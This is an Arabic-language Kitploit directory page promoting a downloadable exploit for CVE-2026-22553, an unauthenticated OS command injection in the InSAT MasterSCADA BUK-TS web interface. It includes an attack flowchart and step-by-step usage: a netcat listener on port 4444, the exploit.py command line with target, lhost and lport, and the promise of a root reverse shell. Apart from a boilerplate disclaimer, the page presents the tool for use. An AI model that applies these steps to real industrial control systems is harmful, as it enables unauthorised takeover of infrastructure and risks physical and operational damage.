Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — غير مصادق عليه استغلال حقن أوامر نظام التشغيل لواجهة ويب InSAT MasterSCADA BUK-TS MMadmServ. يقدم شِل عكسي بامتيازات الجذر عبر طلب HTTP POST. CVSS 9.8 حرج. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
توليد الحمولةالاستغلالأمن SCADA/ICSاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

غير مصادق عليه استغلال حقن أوامر نظام التشغيل لواجهة ويب InSAT MasterSCADA BUK-TS MMadmServ. يقدم شِل عكسي بامتيازات الجذر عبر طلب HTTP POST. CVSS 9.8 حرج.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - RCE بدون مصادقة

CVE-2026-22553 | CVSS 9.8 حرج | مؤلف الاستغلال: محمد إدريس بنيامر


📝 الوصف

InSAT MasterSCADA BUK-TS يعاني من ثغرة حقن أوامر نظام التشغيل بدون مصادقة في واجهة الويب MMadmServ. تسمح هذه الثغرة للمهاجمين عن بُعد بتحقيق تنفيذ أوامر كامل عن بُعد (RCE) بدون أي مصادقة.

  • المنتج المتأثر: InSAT MasterSCADA BUK-TS (جميع الإصدارات)
  • نوع الثغرة: حقن أوامر نظام التشغيل (CWE-78)
  • الخطورة: حرجة (نقاط CVSS v3.1: 9.8)
  • مؤلف الاستغلال: محمد إدريس بنيامر
  • البلد: الأردن 🇯🇴

🛠️ رسم تخطيطي لطريقة الهجوم

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 الاستخدام

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

مثال

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

الخيارات

الخيارالوصف
targetعنوان الهدف (مثل http://ip:port)
--lhostعنوان IP الخاص بك (شل عكسي)
--lportمنفذ الاستماع الخاص بك

📌 طريقة الاستخدام

  1. ابدأ مستمعًا على جهازك:

    root@kitploit:~
    nc -lvnp 4444
    
  2. قم بتشغيل أداة الاستغلال:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. احصل على شل عكسي بصلاحيات الجذر/النظام.


⚠️ إخلاء مسؤولية

تم توفير أداة الاستغلال هذه لأغراض تعليمية واختبار الاختراق المصرح به فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني وقد ينتهك القوانين الدولية.
المؤلف غير مسؤول عن أي إساءة استخدام.


📬 المؤلف

محمد إدريس بنيامر

  • إنستغرام: @banyamer_security
  • جيت هب: mbanyamer
  • البلد: الأردن 🇯🇴

قم بإعطاء نجمة ⭐ لهذا المستودع إذا وجدته مفيدًا!

تنزيل الأداة